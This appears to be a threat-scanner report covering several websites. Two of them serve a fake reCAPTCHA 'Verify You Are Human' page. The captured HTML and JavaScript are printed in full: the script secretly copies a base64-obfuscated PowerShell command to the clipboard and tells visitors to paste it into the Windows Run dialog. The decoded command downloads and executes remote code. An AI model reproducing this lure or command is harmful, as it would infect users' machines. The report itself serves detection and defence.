Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.first-security-verden.de/",
"URLs": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
],
"HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n",
"ThreatLevel": "None"
}
https://www.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.laborpartyjo.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://www.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://www.website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.website.mypetapp.co.za/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n 